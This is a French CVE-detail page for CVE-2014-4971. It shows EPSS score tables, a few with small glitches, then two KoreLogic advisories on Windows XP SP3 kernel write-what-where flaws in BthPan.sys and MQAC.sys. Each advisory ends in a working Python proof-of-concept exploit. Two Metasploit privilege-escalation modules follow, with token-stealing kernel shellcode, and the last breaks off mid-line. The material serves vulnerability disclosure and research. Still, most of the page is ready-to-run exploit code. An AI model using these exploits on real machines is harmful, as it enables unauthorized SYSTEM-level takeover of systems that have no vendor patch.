CVE-2014-4971 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.61%	–	–
2022-04-03	–	–	3.61%	–	–
2022-04-17	–	–	3.61%	–	–
2022-10-30	–	–	3.61%	–	–
2023-01-01	–	–	3.61%	–	–
2023-01-22	–	–	3.61%	–	–
2023-03-12	–	–	–	0.08%	–
2023-09-17	–	–	–	0.08%	–
2023-09-24	–	–	–	0.08%	–
2023-10-08	–	–	–	0.08%	–
2023-12-03	–	–	–	0.08%	–
2023-12-17	–	–	–	0.08%	–
2024-01-07	–	–	–	0.08%	–
2024-06-02	–	–	–	0.08%	–
2024-06-16	–	–	–	0.08%	–
2024-08-04	–	–	–	0.08%	–
2024-08-11	–	–	–	0.08%	–
2024-11-03	–	–	–	0.08%	–
2024-12-22	–	–	–	0.13%	–
2025-03-02	–	–	–	0.13%	–
2025-01-19	–	–	–	0.13%	–
2025-03-09	–	–	–	0.13%	–
2025-03-18	–	–	–	–	26.57%
2025-03-30	–	–	–	–	26.3%
2025-03-30	–	–	–	–	26.3,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	67%
2022-04-03	83%
2022-04-17	84%
2022-10-30	85%
2023-01-01	84%
2023-01-22	85%
2023-03-12	33%
2023-09-17	34%
2023-09-24	33%
2023-10-08	34%
2023-12-03	33%
2023-12-17	34%
2024-01-07	33%
2024-06-02	34%
2024-06-16	35%
2024-08-04	34%
2024-08-11	35%
2024-11-03	36%
2024-12-22	49%
2025-03-02	5%
2025-01-19	49%
2025-03-09	5%
2025-03-18	96%
2025-03-30	96%
2025-03-30	96%

""" Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-002 Publication Date: 2014-07-18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: Bluetooth Personal Area Networking Affected Versions: 5.1.2600.5512 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Privilege Escalation Attack vector: IOCTL CVE ID: CVE-2014-4971 2. Vulnerability Description A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the BthPan device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0012b814 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classicaly known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000. STACK_TEXT: b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92 b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3 b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8 b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25 b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21 b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8 b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93 b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48 b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31 b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70 b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7 b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a WARNING: Stack unwind information not available. Following frames may be wrong. Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the bthpan driver. FOLLOWUP_IP: bthpan!BthpanReqAdd+16b b272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565) Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. TRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630) ErrCode = 00000002 eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000 eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203 nt!IopCompleteRequest+0x92: 804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in BthPan it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation None. A patch is not likely to be forthcoming from the vendor. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows. 2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP. 2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches. 2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report. 2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems. 2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems. 2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined. 2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.11 - Microsoft informs KoreLogic that the vulnerability does not impact any "up-platform" products. Says they are investigating embedded platforms. Does not provide CVE number. 2014.06.24 - Microsoft contacts KoreLogic to say that they confused the report of this vulnerability with another and that they cannot reproduce the described behavior. Microsoft asks for an updated Proof-of-Concept, crash dumps or any further analysis of the vulnerability that KoreLogic can provide. 2014.06.25 - KoreLogic provides Microsoft with an updated Proof-of-Concept which demonstrates using the vulnerability to spawn a system shell. 2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued for this vulnerability. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.07 - KoreLogic requests CVE from MITRE. 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be identical to KL-001-2014-003 and issues CVE-2014-4971 for both vulnerabilities. 2014.07.18 - Public disclosure. 7. Proof of Concept """ #!/usr/bin/python2 # # KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation # Matt Bergin (KoreLogic / Smash the Stack) # CVE-2014-4971 # from ctypes import * from struct import pack from os import getpid,system from sys import exit EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 # thanks to offsec for the concept # I re-wrote the code as to not fully insult them def getBase(name=None): retArray = c_ulong*1024 ImageBase = retArray() callback = c_int(1024) cbNeeded = c_long() EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) for base in ImageBase: driverName = c_char_p("\x00"*1024) GetDeviceDriverBaseNameA(base,driverName,48) if (name): if (driverName.value.lower() == name): return base else: return (base,driverName.value) return None handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == INVALID_HANDLE_VALUE): print "[!] Could not open handle to BthPan" exit(1) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400 WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0))) WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) kBase,kVer = getBase() hKernel = LoadLibraryExA(kVer,0,1) HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += kBase HalDispatchTable += 0x4 DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0) CloseHandle(handle) NtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) exit(0) """ The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt """

Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-003 Publication Date: 2014.07.18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: MQ Access Control Affected Versions: 5.1.0.1110 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Privilege Escalation Attack vector: IOCTL CVE ID: CVE-2014-4971 2. Vulnerability Description A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the MQAC device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x1965020f the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000. STACK_TEXT: b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31 b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70 b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7 b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the mqac driver. OLLOWUP_IP: mqac!AC2QM+5d b230af37 891e mov dword ptr [esi],ebx Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4) ErrCode = 00000002 eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000 eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 mqac!AC2QM+0x5d: b230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=???????? A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in MQAC it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation None. A patch is not likely to be forthcoming from the vendor. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows. 2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP. 2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches. 2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report. 2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems. 2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems. 2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined. 2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.11 - Microsoft responds to KoreLogic that the vulnerability does not affect an "up-platform" product. Says they are investigating embedded platforms. Does not provide a CVE number or a disclosure date. 2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued to this vulnerability. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.07 - KoreLogic requests CVE from MITRE. 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to be identical to KL-001-2014-002 and issues CVE-2014-4971 for both vulnerabilities. 2014.07.18 - Public disclosure. 7. Proof of Concept #!/usr/bin/python2 # # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation # Matt Bergin (KoreLogic / Smash the Stack) # CVE-2014-4971 # from ctypes import * from struct import pack from os import getpid,system from sys import exit EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 # thanks to offsec for the concept # I re-wrote the code as to not fully insult them :) def getBase(name=None): retArray = c_ulong*1024 ImageBase = retArray() callback = c_int(1024) cbNeeded = c_long() EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) for base in ImageBase: driverName = c_char_p("\x00"*1024) GetDeviceDriverBaseNameA(base,driverName,48) if (name): if (driverName.value.lower() == name): return base else: return (base,driverName.value) return None handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) print "[+] Handle \\\\.\\MQAC @ %s" % (handle) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) buf = "\x50\x00\x00\x00"+"\x90"*0x400 WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0))) WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0))) #Overwrite Pointer kBase,kVer = getBase() hKernel = LoadLibraryExA(kVer,0,1) HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += kBase HalDispatchTable += 0x4 print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable)) DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0) print "[+] HalDispatchTable+0x4 overwritten" CloseHandle(handle) NtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) exit(0) The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation', 'Description' => %q{ A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC 'Jay Smith <jsmith[at]korelogic.com>' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ ['Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ] ], 'References' => [ [ 'CVE', '2014-4971' ], [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ], [ 'OSVDB', '109387' ] ], 'DisclosureDate' => 'Jul 18 2014', 'DefaultTarget' => 0 )) end def ring0_shellcode tokenswap = "\x60\x64\xA1\x24\x01\x00\x00" tokenswap << "\x8B\x40\x44\x50\xBB\x04" tokenswap << "\x00\x00\x00\x8B\x80\x88" tokenswap << "\x00\x00\x00\x2D\x88" tokenswap << "\x00\x00\x00\x39\x98\x84" tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8" tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB" tokenswap << [session.sys.process.getpid].pack('V') tokenswap << "\x8B\x80\x88\x00\x00\x00" tokenswap << "\x2D\x88\x00\x00\x00" tokenswap << "\x39\x98\x84\x00\x00\x00" tokenswap << "\x75\xED\x89\xB8\xC8" tokenswap << "\x00\x00\x00\x61\xC3" end def fill_memory(proc, address, length, content) session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") unless proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil end vprint_good("#{address} is now writable") result = proc.memory.write(address, content) if result.nil? vprint_error("Failed to write contents to memory") return nil end vprint_good("Contents successfully written to 0x#{address.to_s(16)}") return address end def disclose_addresses(t) addresses = {} hal_dispatch_table = find_haldispatchtable return nil if hal_dispatch_table.nil? addresses['halDispatchTable'] = hal_dispatch_table vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}") vprint_status('Getting the hal.dll base address...') hal_info = find_sys_base('hal.dll') if hal_info.nil? vprint_error('Failed to disclose hal.dll base address') return nil end hal_base = hal_info[0] vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}") hali_query_system_information = hal_base + t['HaliQuerySystemInfo'] addresses['HaliQuerySystemInfo'] = hali_query_system_information vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}") addresses end def check if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end os = sysinfo["OS"] return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') return Exploit::CheckCode::Safe unless handle session.railgun.kernel32.CloseHandle(handle) return Exploit::CheckCode::Vulnerable end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device") end my_target = targets[0] print_status("Disclosing the HalDispatchTable address...") @addresses = disclose_addresses(my_target) if @addresses.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.") else print_good("Address successfully disclosed.") end print_status("Storing the shellcode in memory...") this_proc = session.sys.process.open kernel_shell = ring0_shellcode kernel_shell_address = 0x1 buf = "\x90" * 0x6000 buf[0, 1028] = "\x50\x00\x00\x00" + "\x90" * 0x400 buf[0x5000, kernel_shell.length] = kernel_shell result = fill_memory(this_proc, kernel_shell_address, buf.length, buf) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory") end print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}") print_status("Triggering the vulnerability, corrupting the HalDispatchTable...") session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0) session.railgun.kernel32.CloseHandle(handle) print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") session.railgun.ntdll.NtQueryIntervalProfile(2, 4) print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The privilege escalation wasn't successful") end print_good("Privilege escalation successful!") p = payload.encoded print_status("Injecting #{p.length} bytes to memory and executing it...") unless execute_shellcode(p) fail_with(Failure::Unknown, "Error while executing the payload") end end end

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info={}) super(update_info(info, { 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation', 'Description' => %q{ A vulnerability within the MQAC.sys module allows an attacker to overwrite an arbitrary location in kernel memory. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin', # original exploit and all the hard work 'Spencer McIntyre' # MSF module ], 'Arch' => [ ARCH_X86 ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows XP SP3', { '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ], ], 'References' => [ [ 'CVE', '2014-4971' ], [ 'EDB', '34112' ], [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ] ], 'DisclosureDate'=> 'Jul 22 2014', 'DefaultTarget' => 0 })) end def find_sys_base(drvname) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]]) session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]]) results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*") addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) current_drvname = results['lpBaseName'][0..results['return'] - 1] if drvname == nil if current_drvname.downcase.include?('krnl') return [address, current_drvname] end elsif drvname == results['lpBaseName'][0..results['return'] - 1] return [address, current_drvname] end end end # Function borrowed from smart_hashdump def get_system_proc # Make sure you got the correct SYSTEM Account Name no matter the OS Language local_sys = resolve_sid("S-1-5-18") system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}" this_pid = session.sys.process.getpid # Processes that can Blue Screen a host if migrated in to dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"] session.sys.process.processes.each do |p| # Check we are not migrating to a process that can BSOD the host next if dangerous_processes.include?(p["name"]) next if p["pid"] == this_pid next if p["pid"] == 4 next if p["user"] != system_account_name return p end end def open_device handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil) if handle['return'] == 0 print_error('Failed to open the \\\\.\\MQAC device') return nil end handle = handle['return'] end def check handle = open_device if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) os = sysinfo["OS"] case os when /windows xp.*service pack 3/i return Exploit::CheckCode::Appears when /windows xp/i return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit if sysinfo["Architecture"] =~ /wow64/i print_error("Running against WOW64 is not supported") return elsif sysinfo["Architecture"] =~ /x64/ print_error("Running against 64-bit systems is not supported") return end if is_system? print_error("This meterpreter session is already running as SYSTEM") return end kernel_info = find_sys_base(nil) base_addr = 0xffff print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}") handle = open_device return if handle.nil? this_proc = session.sys.process.open unless this_proc.memory.writable?(base_addr) session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end unless this_proc.memory.writable?(base_addr) print_error('Failed to properly allocate memory') this_proc.close return end hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) hKernel = hKernel['return'] halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable") halDispatchTable = halDispatchTable['return'] halDispatchTable -= hKernel halDispatchTable += kernel_info[0] print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") tokenstealing = "\x52" # push edx # Save edx on the stack tokenstealing << "\x53" # push ebx # Save ebx on the stack tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0 tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD tokenstealing << "\x8b\x40" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS tokenstealing << "\x8b\xc8" # mov ecx, eax tokenstealing << "\x8b\x98" + target['_TOKEN'] + 